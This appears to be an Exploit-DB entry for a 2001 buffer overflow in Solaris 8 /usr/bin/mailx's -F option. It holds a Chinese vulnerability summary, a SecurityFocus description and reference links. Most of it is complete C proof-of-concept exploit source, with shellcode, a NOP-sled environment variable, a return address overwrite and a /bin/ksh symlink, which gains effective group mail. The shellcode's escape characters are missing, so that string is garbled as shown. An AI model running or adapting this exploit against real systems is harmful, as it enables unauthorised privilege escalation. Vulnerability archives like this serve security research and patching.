https://www.exploit-db.com/exploits/20772
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-072

Solaris8版本及之前版本的mailx存在缓冲区溢出漏洞。本地攻击者可以借助超长’-F’命令行选项提升额外特权。

source: http://www.securityfocus.com/bid/2610/info

Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.

A problem with the handling of a long string of characters by the -F option makes it possible for a local user to gain elevated privileges. Due to the insufficient handling of input by the -F option of mailx, a buffer overflow at 1150 characters makes it possible to overwrite variables on the stack, including the return address.

This problem makes it possible for a local user gain elevated privileges, attaining an effective GID of mail. 

#include <fcntl.h>

/*

   /usr/bin/mailx overflow proof of conecpt.


   Pablo Sor, Buenos Aires, Argentina 04/2001
   [email protected], [email protected]

   works against x86 solaris 8

   default offset should work.

   usage:

   bash$ id
   uid=100(laika) gid=1(other)

   bash$ ./mailx-exp
   Subject: tomy
   .
   EOT

   [wait...]

   $ id
   uid=100(laika) gid=1(other) egid=6(mail)


*/

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{

char shell[]=
"xebx1cx5ex33xc0x33xdbxb3x08xfexc3x2bxf3x88x06"
"x6ax06x50xb0x88x9axffxffxffxffx07xeexebx06x90"
"xe8xdfxffxffxffx55x8bxecx83xecx08xebx5dx33xc0"
"xb0x3axfexc0xebx16xc3x33xc0x40xebx10xc3x5ex33"
"xdbx89x5ex01xc6x46x05x07x88x7ex06xebx05xe8xec"
"xffxffxffx9axffxffxffxffx0fx0fxc3x5ex33xc0x89"
"x76x08x88x46x07x33xd2xb2x06x02xd2x89x04x16x50"
"x8dx46x08x50x8bx46x08x50xe8xb5xffxffxffx33xd2"
"xb2x06x02xd2x03xe2x6ax01xe8xafxffxffxffx83xc4"
"x04xe8xc9xffxffxffx2fx74x6dx70x2fx78x78";

 unsigned long magic = get_esp() + 2075;  /* default offset */
 unsigned char buf[1150];
 char *envi;

 envi = (char *)malloc(300*sizeof(char));
 memset(envi,0x90,300);
 memcpy(envi+280-strlen(shell),shell,strlen(shell));
 memcpy(envi,"SOR=",4);
 envi[299]=0;
 putenv(envi);

 symlink("/bin/ksh","/tmp/xx");
 memset(buf,0x41,1150);
 memcpy(buf+1116,&magic,4);
 buf[1149]=0;
 execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}

来源:US-CERTVulnerabilityNote:VU#446864
名称:VU#446864
链接:http://www.kb.cert.org/vuls/id/446864
来源:BUGTRAQ
名称:20010502SolarismailxVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-05/0016.html
来源:XF
名称:solaris-mailx-f-bo(8246)
链接:http://xforce.iss.net/static/8246.php
来源:BID
名称:2610
链接:http://www.securityfocus.com/bid/2610
来源:BUGTRAQ
名称:20010511Solaris/usr/bin/mailxexploit(SPARC)
链接:http://online.securityfocus.com/archive/1/184210